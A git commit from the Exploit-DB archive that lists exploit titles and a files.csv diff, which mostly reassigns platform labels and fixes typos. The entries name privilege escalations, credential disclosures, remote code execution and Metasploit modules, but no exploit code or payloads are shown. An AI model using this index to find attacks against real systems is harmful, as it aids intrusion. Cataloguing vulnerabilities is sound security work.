DB: 2017-02-01

65 new exploits

Quake 3 Engine Client (Windows x86) - CS_ITEms Remote Overflow

Mercur IMAPD 5.00.14 (Windows x86) - Remote Denial of Service

PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow

PHP 5.2.0 (Windows x86) - 'PHP_iisfunc.dll' Local Buffer Overflow

32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow (PoC)

Apple Safari 3.2.3 (Windows x86) - JavaScript (eval) Remote Denial of Service

Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service

Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service

ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x32/x64) - LZH archive parsing (PoC)
ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x86/x64) - LZH archive parsing (PoC)

Linux Kernel 2.6.x (x64) - Personality Handling Local Denial of Service

VMware Workstations 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read

Samba < 3.6.2 (x86) - Denial of Serviec (PoC)

Adobe Flash - Bad Dereference at 0x23c on Linux x64
Adobe Flash (Linux x64) - Bad Dereference at 0x23c

Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited

Core FTP Server 32-bit Build 587 - Heap Overflow

Windows 10 x86/x64 WLAN AutoConfig - Denial of Service (POC)
Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (POC)

RedHat 6.2 /usr/bin/rcp - SUID Privilege Escalation
RedHat 6.2 /usr/bin/rcp - 'SUID' Privilege Escalation

Setuid perl - PerlIO_Debug() Root Owned File Creation Privilege Escalation
Setuid perl - 'PerlIO_Debug()' Root Owned File Creation Privilege Escalation
Wireless Tools 26 (IWConfig) - Privilege Escalation (some setuid)
Qpopper 4.0.8 (Linux) - (poppassd) Privilege Escalation
Wireless Tools 26 (IWConfig) - Privilege Escalation
Qpopper 4.0.8 (Linux) - 'poppassd' Privilege Escalation

Navicat Premium 11.2.11 (x64) - Local Database Password Disclosure
Rocks Clusters 4.1 - (umount-loop) Privilege Escalation
Rocks Clusters 4.1 - (mount-loop) Privilege Escalation
Rocks Clusters 4.1 - 'umount-loop' Privilege Escalation
Rocks Clusters 4.1 - 'mount-loop' Privilege Escalation

PrivateTunnel Client 2.7.0 (x64) - Local Credentials Disclosure

Linux Kernel 2.4 / 2.6 (x86-64) - System Call Emulation Privilege Escalation

Postfix 2.6-20080814 - (symlink) Privilege Escalation
Postfix 2.6-20080814 - 'symlink' Privilege Escalation

Oracle Database Vault - ptrace(2) Privilege Escalation
Oracle Database Vault - 'ptrace(2)' Privilege Escalation

Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off-by-One Local Exploit
Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - set_selection() UTF-8 Off-by-One Local Exploit

Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)
Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation
Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation
Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation
Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation

GNU C Library 2.x (libc6) - Dynamic Linker LD_AUDIT Arbitrary DSO Load (Privilege Escalation)
GNU C Library 2.x (libc6) - (Dynamic Linker LD_AUDIT Arbitrary DSO Load) Privilege Escalation

Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Privilege Escalation (1)

Free Download Manager - Torrent Parsing Buffer Overflow (Metasploit)
Free Download Manager 3.0 Build 844 - Torrent Parsing Buffer Overflow (Metasploit)

VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit)

PolicyKit polkit-1 < 0.101 - Linux Privilege Escalation
PolicyKit polkit-1 < 0.101 - Privilege Escalation
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Privilege Escalation (Sendmail) (1)
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Privilege Escalation (Sendmail 8.10.1) (2)
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) -  (Sendmail) Capabilities Privilege Escalation(1)
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) -  (Sendmail 8.10.1) Capabilities Privilege Escalation (2)
QNX RTOS 4.25/6.1 - phgrafxPrivilege Escalation
QNX RTOS 4.25/6.1 - phgrafx-startup Privilege Escalation
QNX RTOS 4.25/6.1 - 'phgrafx' Privilege Escalation
QNX RTOS 4.25/6.1 - 'phgrafx-startup' Privilege Escalation

Dropbox Desktop Client 9.4.49 (x64) - Local Credentials Disclosure

Microsoft Windows 10 10586 (x32/x64) / 8.1 Update 2 - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111)
Microsoft Windows 10 10586 (x86/x64) / 8.1 Update 2 - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111)

MySQL 3.23.x - mysqld Privilege Escalation
MySQL 3.23.x - 'mysqld' Privilege Escalation
Platform Load Sharing Facility 4/5/6 - EAuth Privilege Escalation
MTools 3.9.x - MFormat Privilege Escalation
Platform Load Sharing Facility 4/5/6 - 'EAuth' Privilege Escalation
MTools 3.9.x - 'MFormat' Privilege Escalation

Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Privilege Escalation (1)

sudo 1.8.0 < 1.8.3p1 (sudo_debug) - Privilege Escalation + glibc FORTIFY_SOURCE Bypass
sudo 1.8.0 < 1.8.3p1 (sudo_debug) - glibc FORTIFY_SOURCE Bypass + Privilege Escalation

Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Privilege Escalation (2)

ZABBIX 1.1.4/1.4.2 - daemon_start Privilege Escalation
ZABBIX 1.1.4/1.4.2 - 'daemon_start' Privilege Escalation

Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Privilege Escalation (3)

LogMeIn Client 1.3.2462 (x64) - Local Credentials Disclosure

Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation

Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow 'schlamperei.x86.dll' (MS13-053) (Metasploit)

Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Local Echo Race Condition Privilege Escalation

Linux Kernel 3.2.0-23 / 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Privilege Escalation (3)

TeamViewer 11.0.65452 (x64) - Local Credentials Disclosure

Linux Kernel 3.13 - Privilege Escalation PoC (SGID)
Linux Kernel 3.13 -  (SGID) Privilege Escalation (PoC)

OSSEC 2.8 - hosts.deny Privilege Escalation
OSSEC 2.8 - 'hosts.deny' Privilege Escalation

Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition
Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition Privilege Escalation
Linux espfix64 - Privilege Escalation (Nested NMIs Interrupting)
Linux (x86) - Memory Sinkhole Privilege Escalation (PoC)
Linux espfix64 -  (Nested NMIs Interrupting) Privilege Escalation
Linux (x86) - Memory Sinkhole Privilege Escalation (PoC)

RHEL 7.0/7.1 - abrt/sosreport Privilege Escalation
RHEL 7.0/7.1 - 'abrt/sosreport' Privilege Escalation

MySQL 5.5.45 (x64) - Local Credentials Disclosure

Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD) Privilege Escalation
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation

ACROS Security 0patch 2016.05.19.539 - '0PatchServicex64.exe' Unquoted Service Path Privilege Escalation

Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation

Microsoft Windows 7 (x32/x64) - Group Policy Privilege Escalation (MS16-072)
Microsoft Windows 7 (x86/x64) - Group Policy Privilege Escalation (MS16-072)

Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak

Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation

Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)

Viscosity 1.6.7 - Privilege Escalation

BeroFTPD 1.3.4(1) (Linux/x86) - Remote Code Execution
BeroFTPD 1.3.4(1) (Linux x86) - Remote Code Execution

Solaris /bin/login (SPARC/x86) - Remote Code Execution

gpsdrive 2.09 (x86) - (friendsd2) Remote Format String

PrivateWire Gateway 3.7 (Windows x86) - Remote Buffer Overflow (Metasploit)

dproxy-nexgen (Linux/x86) - Buffer Overflow
dproxy-nexgen (Linux x86) - Buffer Overflow
32bit FTP (09.04.24) - 'CWD Response' Remote Buffer Overflow
32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow
32bit FTP (09.04.24) - 'CWD Response' Universal Overwrite (SEH)
32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit)
32bit FTP (09.04.24) - 'CWD Response' Remote Buffer Overflow
32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow
32bit FTP (09.04.24) - 'CWD Response' Universal Overwrite (SEH)
32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit)

Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)

AASync 2.2.1.0 (Windows x86) - Stack Buffer Overflow 'LIST' (Metasploit)

32bit FTP Client - Stack Buffer Overflow (Metasploit)

Free Download Manager - Remote Control Server Buffer Overflow (Metasploit)
Free Download Manager 2.5 Build 758 - Remote Control Server Buffer Overflow (Metasploit)

Apache (Windows x86) - Chunked Encoding (Metasploit)

PeerCast 0.1216 (Windows x86) - URL Handling Buffer Overflow (Metasploit)

CA CAM (Windows x86) - log_security() Stack Buffer Overflow (Metasploit)
Samba 3.3.12 (Linux/x86) - 'chain_reply' Memory Corruption (Metasploit)
Samba 2.2.8 (Linux x86) - 'trans2open' Overflow (Metasploit)
Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit)
Samba 2.2.8 (Linux x86) - 'trans2open' Overflow (Metasploit)

Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit)

Webmin 0.x - RPC Function Privilege Escalation
Webmin 0.x - 'RPC' Function Privilege Escalation

Nginx 1.3.9/1.4.0 (x86) - Brute Force Remote Exploit

Nginx 1.4.0 (x64) - (Generic Linux) Remote Exploit
Nginx 1.4.0 (x64) (Generic Linux) - Remote Exploit

technote 7.2 - Remote File Inclusion
Technote 7.2 - Remote File Inclusion
JAWS 0.2/0.3 - 'index.php' gadget Parameter Traversal Arbitrary File Access
JAWS 0.2/0.3 - Cookie Manipulation Authentication Bypass
JAWS 0.2/0.3 - 'index.php' action Parameter Cross-Site Scripting
Jaws 0.2/0.3 - 'gadget' Parameter Traversal Arbitrary File Access
Jaws 0.2/0.3 - Cookie Manipulation Authentication Bypass
Jaws 0.2/0.3 - 'action' Parameter Cross-Site Scripting

JAWS 0.2/0.3/0.4 - ControlPanel.php SQL Injection
Jaws 0.2/0.3/0.4 - ControlPanel.php SQL Injection

JAWS Glossary 0.4/0.5 - Cross-Site Scripting
Jaws Glossary 0.4/0.5 - Cross-Site Scripting

JAWS 0.x - Remote File Inclusion
Jaws 0.x - Remote File Inclusion

FlatNux 2009-03-27 - Multiple Cross-Site Scripting Vulnerabilities
Flatnux 2009-03-27 - Multiple Cross-Site Scripting Vulnerabilities

Multiple Netgear Routers - Password Disclosure
Video Sharing Script 4.94 - 'uid' Parameter SQL Injection
Netman 204 - Backdoor Account / Password Reset
This commit is contained in:
Offensive Security 2017-02-01 05:01:19 +00:00
parent bf6526a40b
commit 1a4e6f50a9
70 changed files with 574 additions and 135 deletions

204
files.csv
View file

@ -356,7 +356,7 @@ id,file,description,date,author,platform,type,port
1967,platforms/windows/dos/1967.c,"Microsoft Windows - TCP/IP Protocol Driver Remote Buffer Overflow",2006-06-30,Preddy,windows,dos,0
1972,platforms/multiple/dos/1972.txt,"Opera Web Browser 9.00 - (iframe) Remote Denial of Service",2006-07-01,y3dips,multiple,dos,0
1976,platforms/windows/dos/1976.cpp,"Quake 3 Engine Client - CG_ServerCommand() Remote Overflow",2006-07-02,RunningBon,windows,dos,0
1977,platforms/windows/dos/1977.cpp,"Quake 3 Engine Client (Windows x86) - CS_ITEms Remote Overflow",2006-07-02,RunningBon,windows,dos,0
1977,platforms/win_x86/dos/1977.cpp,"Quake 3 Engine Client (Windows x86) - CS_ITEms Remote Overflow",2006-07-02,RunningBon,win_x86,dos,0
1980,platforms/windows/dos/1980.pl,"ImgSvr 0.6.5 - (long http post) Denial of Service",2006-07-04,n00b,windows,dos,0
1984,platforms/windows/dos/1984.py,"WinRAR 3.60 Beta 6 - (SFX Path) Stack Overflow",2006-07-05,posidron,windows,dos,0
1989,platforms/windows/dos/1989.html,"Microsoft Internet Explorer 6 - Table.Frameset NULL Dereference",2006-07-07,"Aviv Raff",windows,dos,0
@ -531,7 +531,7 @@ id,file,description,date,author,platform,type,port
3464,platforms/windows/dos/3464.cpp,"News Bin Pro 4.32 - Article Grabbing Remote Unicode Buffer Overflow",2007-03-12,Marsu,windows,dos,0
3514,platforms/windows/dos/3514.pl,"Avant Browser 11.0 build 26 - Remote Stack Overflow Crash",2007-03-18,DATA_SNIPER,windows,dos,0
3526,platforms/hardware/dos/3526.pl,"Cisco Phone 7940/7960 - (SIP INVITE) Remote Denial of Service",2007-03-20,MADYNES,hardware,dos,0
3527,platforms/windows/dos/3527.pl,"Mercur IMAPD 5.00.14 (Windows x86) - Remote Denial of Service",2007-03-20,mu-b,windows,dos,0
3527,platforms/win_x86/dos/3527.pl,"Mercur IMAPD 5.00.14 (Windows x86) - Remote Denial of Service",2007-03-20,mu-b,win_x86,dos,0
3535,platforms/hardware/dos/3535.pl,"Grandstream Budge Tone-200 IP Phone - (Digest domain) Denial of Service",2007-03-21,MADYNES,hardware,dos,0
3547,platforms/windows/dos/3547.c,"0irc-client 1345 build20060823 - Denial of Service",2007-03-22,DiGitalX,windows,dos,0
3566,platforms/multiple/dos/3566.pl,"Asterisk 1.2.16 / 1.4.1 - SIP INVITE Remote Denial of Service",2007-03-25,MADYNES,multiple,dos,0
@ -622,12 +622,12 @@ id,file,description,date,author,platform,type,port
4285,platforms/windows/dos/4285.c,"CounterPath X-Lite 3.x - SIP phone Remote Denial of Service",2007-08-13,ZwelL,windows,dos,0
4288,platforms/windows/dos/4288.c,"Wireshark < 0.99.6 - Mms Remote Denial of Service",2007-08-14,ZwelL,windows,dos,0
4289,platforms/windows/dos/4289.php,"EFS Easy Chat Server 2.2 - Remote Denial of Service",2007-08-14,NetJackal,windows,dos,0
4293,platforms/windows/dos/4293.php,"PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow",2007-08-18,boecke,windows,dos,0
4293,platforms/win_x86/dos/4293.php,"PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow",2007-08-18,boecke,win_x86,dos,0
4294,platforms/windows/dos/4294.pl,"Mercury/32 Mail SMTPD - Remote Unauthenticated Stack Based Overrun (PoC)",2007-08-18,eliteboy,windows,dos,0
4297,platforms/hardware/dos/4297.pl,"Cisco IP Phone 7940 - (3 SIP Messages) Remote Denial of Service",2007-08-21,MADYNES,hardware,dos,0
4298,platforms/hardware/dos/4298.pl,"Cisco IP Phone 7940 - (10 SIP Messages) Remote Denial of Service",2007-08-21,MADYNES,hardware,dos,0
4304,platforms/windows/dos/4304.php,"PHP 5.2.3 - PHP_ntuser ntuser_getuserlist() Local Buffer Overflow (PoC)",2007-08-23,shinnai,windows,dos,0
4318,platforms/windows/dos/4318.php,"PHP 5.2.0 (Windows x86) - 'PHP_iisfunc.dll' Local Buffer Overflow",2007-08-27,boecke,windows,dos,0
4318,platforms/win_x86/dos/4318.php,"PHP 5.2.0 (Windows x86) - 'PHP_iisfunc.dll' Local Buffer Overflow",2007-08-27,boecke,win_x86,dos,0
4319,platforms/hardware/dos/4319.pl,"Thomson SpeedTouch ST 2030 (SIP Phone) - Remote Denial of Service",2007-08-27,MADYNES,hardware,dos,0
4335,platforms/windows/dos/4335.txt,"Yahoo! Messenger 8.1.0.413 - (webcam) Remote Crash",2007-08-29,wushi,windows,dos,0
4337,platforms/windows/dos/4337.c,"Microsoft Windows - 'gdi32.dll' Denial of Service (MS07-046)",2007-08-29,"Gil-Dong / Woo-Chi",windows,dos,0
@ -1044,7 +1044,7 @@ id,file,description,date,author,platform,type,port
8601,platforms/windows/dos/8601.txt,"EW-MusicPlayer 0.8 - '.m3u' Local Buffer Overflow (PoC)",2009-05-04,SirGod,windows,dos,0
8606,platforms/windows/dos/8606.py,"Quick 'n Easy Mail Server 3.3 (Demo) - Remote Denial of Service (PoC)",2009-05-04,shinnai,windows,dos,0
8607,platforms/windows/dos/8607.pl,"Bmxplay 0.4.4b - '.bmx' Local Buffer Overflow (PoC)",2009-05-04,SirGod,windows,dos,0
8611,platforms/windows/dos/8611.pl,"32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow (PoC)",2009-05-05,"Load 99%",windows,dos,0
8611,platforms/win_x86/dos/8611.pl,"32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow (PoC)",2009-05-05,"Load 99%",win_x86,dos,0
8617,platforms/windows/dos/8617.pl,"Sorinara Streaming Audio Player 0.9 - '.m3u' Local Stack Overflow (PoC)",2009-05-05,Cyber-Zone,windows,dos,0
8625,platforms/windows/dos/8625.pl,"Sorinara Streaming Audio Player 0.9 - '.pla' Local Stack Overflow (PoC)",2009-05-07,GoLd_M,windows,dos,0
8644,platforms/windows/dos/8644.pl,"ViPlay3 < 3.00 - '.vpl' Local Stack Overflow (PoC)",2009-05-08,LiquidWorm,windows,dos,0
@ -1183,7 +1183,7 @@ id,file,description,date,author,platform,type,port
9587,platforms/windows/dos/9587.txt,"Microsoft IIS 5.0/6.0 FTP Server - (Stack Exhaustion) Denial of Service",2009-09-04,kingcope,windows,dos,0
9594,platforms/windows/dos/9594.txt,"Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death (MS07-063)",2009-09-09,"laurent gaffie",windows,dos,0
9597,platforms/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 - Remote Denial of Service",2009-09-09,karak0rsan,windows,dos,0
9606,platforms/windows/dos/9606.pl,"Apple Safari 3.2.3 (Windows x86) - JavaScript (eval) Remote Denial of Service",2009-09-09,"Jeremy Brown",windows,dos,0
9606,platforms/win_x86/dos/9606.pl,"Apple Safari 3.2.3 (Windows x86) - JavaScript (eval) Remote Denial of Service",2009-09-09,"Jeremy Brown",win_x86,dos,0
9607,platforms/windows/dos/9607.pl,"Ipswitch WS_FTP 12 Professional - Remote Format String (PoC)",2009-09-09,"Jeremy Brown",windows,dos,0
9617,platforms/windows/dos/9617.txt,"Dnsmasq < 2.50 - Heap Overflow / Null Pointer Dereference",2009-09-09,"Core Security",windows,dos,0
9620,platforms/windows/dos/9620.pl,"Media Player Classic 6.4.9 - '.mid' Integer Overflow (PoC)",2009-09-09,PLATEN,windows,dos,0
@ -1243,7 +1243,7 @@ id,file,description,date,author,platform,type,port
10091,platforms/windows/dos/10091.txt,"XLPD 3.0 - Remote Denial of Service",2009-10-06,"Francis Provencher",windows,dos,515
10092,platforms/windows/dos/10092.txt,"Yahoo! Messenger 9.0.0.2162 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service",2009-11-12,HACKATTACK,windows,dos,0
10100,platforms/windows/dos/10100.py,"FTPDMIN 0.96 - 'LIST' Remote Denial of Service",2007-03-20,shinnai,windows,dos,21
10102,platforms/windows/dos/10102.pl,"Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service",2009-11-16,"Jeremy Brown",windows,dos,80
10102,platforms/win_x86/dos/10102.pl,"Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service",2009-11-16,"Jeremy Brown",win_x86,dos,80
10103,platforms/windows/dos/10103.txt,"Mozilla Thunderbird 2.0.0.23 Mozilla SeaMonkey 2.0 - 'jar50.dll' Null Pointer Dereference",2009-11-16,"Marcin Ressel",windows,dos,0
10104,platforms/windows/dos/10104.py,"XM Easy Personal FTP Server - 'APPE' / 'DELE' Commands Denial of Service",2009-11-13,zhangmc,windows,dos,21
10106,platforms/windows/dos/10106.c,"Avast! 4.8.1351.0 AntiVirus - 'aswMon2.sys' Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0
@ -1520,7 +1520,7 @@ id,file,description,date,author,platform,type,port
12425,platforms/windows/dos/12425.html,"Webkit (Apple Safari 4.0.5) - Blink Tag Stack Exhaustion Denial of Service",2010-04-27,Dr_IDE,windows,dos,0
12431,platforms/windows/dos/12431.html,"Webmoney Advisor - ActiveX Remote Denial of Service",2010-04-28,Go0o$E,windows,dos,0
12437,platforms/windows/dos/12437.html,"Apple Safari 4.0.3 / 4.0.4 - Stack Exhaustion",2010-04-28,"Fredrik Nordberg Almroth",windows,dos,0
12457,platforms/windows/dos/12457.txt,"Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service",2010-04-29,ITSecTeam,windows,dos,0
12457,platforms/win_x86/dos/12457.txt,"Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service",2010-04-29,ITSecTeam,win_x86,dos,0
12477,platforms/windows/dos/12477.txt,"Google Chrome 4.1.249.1064 - Remote Memory Corrupt",2010-05-01,eidelweiss,windows,dos,0
12482,platforms/windows/dos/12482.py,"TFTPGUI - Long Transport Mode Overflow",2010-05-02,"Jeremiah Talamantes",windows,dos,0
12487,platforms/windows/dos/12487.html,"Apple Safari 4.0.5 - 'JavaScriptCore.dll' Stack Exhaustion",2010-05-03,"Mathias Karlsson",windows,dos,0
@ -1533,7 +1533,7 @@ id,file,description,date,author,platform,type,port
12518,platforms/windows/dos/12518.pl,"Microsoft Paint - Integer Overflow (Denial of Service) (MS10-005)",2010-05-06,unsign,windows,dos,0
12524,platforms/windows/dos/12524.py,"Microsoft Windows - SMB2 Negotiate Protocol (0x72) Response Denial of Service",2010-05-07,"Jelmer de Hen",windows,dos,0
12527,platforms/asp/dos/12527.txt,"Administrador de Contenidos - Admin Login Bypass",2010-05-07,Ra3cH,asp,dos,0
12529,platforms/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x32/x64) - LZH archive parsing (PoC)",2010-05-07,"Oleksiuk Dmitry_ eSage Lab",windows,dos,0
12529,platforms/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x86/x64) - LZH archive parsing (PoC)",2010-05-07,"Oleksiuk Dmitry_ eSage Lab",windows,dos,0
12530,platforms/windows/dos/12530.rb,"TFTPGUI 1.4.5 - Long Transport Mode Overflow Denial of Service (Metasploit)",2010-05-08,"Jeremiah Talamantes",windows,dos,0
12531,platforms/windows/dos/12531.pl,"GeoHttpServer - Remote Denial of Service",2010-05-08,aviho1,windows,dos,0
12541,platforms/windows/dos/12541.php,"Dolphin 2.0 - '.elf' Local Denial of Service",2010-05-09,"Yakir Wizman",windows,dos,0
@ -4244,7 +4244,7 @@ id,file,description,date,author,platform,type,port
33559,platforms/multiple/dos/33559.txt,"Sun Java System Web Server 7.0 Update 6 - 'admin' Server Denial of Service",2010-01-22,Intevydis,multiple,dos,0
33560,platforms/multiple/dos/33560.txt,"Sun Java System Web Server 6.1/7.0 - WebDAV Format String",2010-01-22,Intevydis,multiple,dos,0
33571,platforms/linux/dos/33571.txt,"PostgreSQL - 'bitsubstr' Buffer Overflow",2010-01-27,Intevydis,linux,dos,0
33585,platforms/linux/dos/33585.txt,"Linux Kernel 2.6.x (x64) - Personality Handling Local Denial of Service",2010-02-01,"Mathias Krause",linux,dos,0
33585,platforms/lin_x86-64/dos/33585.txt,"Linux Kernel 2.6.x (x64) - Personality Handling Local Denial of Service",2010-02-01,"Mathias Krause",lin_x86-64,dos,0
33587,platforms/windows/dos/33587.html,"Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero",2014-05-30,"Pawel Wylecial",windows,dos,0
33607,platforms/multiple/dos/33607.html,"Mozilla Firefox 3.5.x and SeaMonkey 2.0.1 - Remote Denial of Service",2010-02-07,"599eme Man",multiple,dos,0
33608,platforms/windows/dos/33608.html,"Apple Safari 4.0.4 - Remote Denial of Service",2010-02-07,"599eme Man",windows,dos,0
@ -4388,7 +4388,7 @@ id,file,description,date,author,platform,type,port
35173,platforms/linux/dos/35173.txt,"Minix 3.3.0 - Local Denial of Service (PoC)",2014-11-06,nitr0us,linux,dos,0
35178,platforms/windows/dos/35178.py,"i.Hex 0.98 - Local Crash (PoC)",2014-11-06,metacom,windows,dos,0
35179,platforms/windows/dos/35179.py,"i.Mage 1.11 - Local Crash (PoC)",2014-11-06,metacom,windows,dos,0
35182,platforms/windows/dos/35182.txt,"VMware Workstations 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read",2014-11-06,KoreLogic,windows,dos,0
35182,platforms/win_x86/dos/35182.txt,"VMware Workstations 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read",2014-11-06,KoreLogic,win_x86,dos,0
35202,platforms/windows/dos/35202.py,"Microsoft Internet Explorer 11 - Denial of Service",2014-11-10,"Behrooz Abbassi",windows,dos,0
35217,platforms/windows/dos/35217.txt,"CorelDRAW X7 CDR File - 'CdrTxt.dll' Off-by-One Stack Corruption",2014-11-12,LiquidWorm,windows,dos,0
35240,platforms/linux/dos/35240.c,"acpid 1.0.x - Multiple Local Denial of Service Vulnerabilities",2011-01-19,"Vasiliy Kulikov",linux,dos,0
@ -4513,7 +4513,7 @@ id,file,description,date,author,platform,type,port
36662,platforms/windows/dos/36662.txt,"Edraw Diagram Component 5 - ActiveX Control 'LicenseName()' Method Buffer Overflow",2012-02-06,"Senator of Pirates",windows,dos,0
36669,platforms/linux/dos/36669.txt,"Apache APR - Hash Collision Denial of Service",2012-01-05,"Moritz Muehlenhoff",linux,dos,0
36682,platforms/php/dos/36682.php,"PHP PDORow Object - Remote Denial of Service",2011-09-24,anonymous,php,dos,0
36741,platforms/linux/dos/36741.py,"Samba < 3.6.2 (x86) - Denial of Serviec (PoC)",2015-04-13,sleepya,linux,dos,0
36741,platforms/lin_x86/dos/36741.py,"Samba < 3.6.2 (x86) - Denial of Serviec (PoC)",2015-04-13,sleepya,lin_x86,dos,0
36743,platforms/linux/dos/36743.c,"Linux Kernel 3.13 / 3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service",2015-04-13,"Emeric Nasi",linux,dos,0
36773,platforms/windows/dos/36773.c,"Microsoft Windows - 'HTTP.sys' PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0
36776,platforms/windows/dos/36776.py,"Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80
@ -4642,7 +4642,7 @@ id,file,description,date,author,platform,type,port
37865,platforms/multiple/dos/37865.txt,"Adobe Flash - attachMovie Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0
37866,platforms/linux/dos/37866.txt,"Adobe Flash - Pointer Crash in Drawing and Bitmap Handling",2015-08-19,"Google Security Research",linux,dos,0
37867,platforms/linux/dos/37867.txt,"Adobe Flash - Pointer Crash After Continuing Slow Script",2015-08-19,"Google Security Research",linux,dos,0
37868,platforms/linux/dos/37868.txt,"Adobe Flash - Bad Dereference at 0x23c on Linux x64",2015-08-19,"Google Security Research",linux,dos,0
37868,platforms/lin_x86-64/dos/37868.txt,"Adobe Flash (Linux x64) - Bad Dereference at 0x23c",2015-08-19,"Google Security Research",lin_x86-64,dos,0
37869,platforms/linux/dos/37869.txt,"Adobe Flash - Pointer Crash in Button Handling",2015-08-19,"Google Security Research",linux,dos,0
37870,platforms/linux/dos/37870.txt,"Adobe Flash - Pointer Crash in XML Handling",2015-08-19,"Google Security Research",linux,dos,0
37871,platforms/multiple/dos/37871.txt,"Adobe Flash - swapDepths Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0
@ -5081,7 +5081,7 @@ id,file,description,date,author,platform,type,port
39654,platforms/windows/dos/39654.pl,"Xion Audio Player 1.5 (build 160) - '.mp3' Crash (PoC)",2016-04-04,"Charley Celice",windows,dos,0
39657,platforms/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,multiple,dos,0
39663,platforms/windows/dos/39663.html,"Microsoft Internet Explorer - MSHTML!CSVGHelpers::SetAttributeStringAndPointer Use-After-Free (MS16-023)",2016-04-05,"Google Security Research",windows,dos,0
39669,platforms/linux/dos/39669.txt,"Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited",2016-04-06,"Hector Marco and Ismael Ripoll",linux,dos,0
39669,platforms/lin_x86/dos/39669.txt,"Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited",2016-04-06,"Hector Marco and Ismael Ripoll",lin_x86,dos,0
39685,platforms/android/dos/39685.txt,"Google Android - IOMX getConfig/getParameter Information Disclosure",2016-04-11,"Google Security Research",android,dos,0
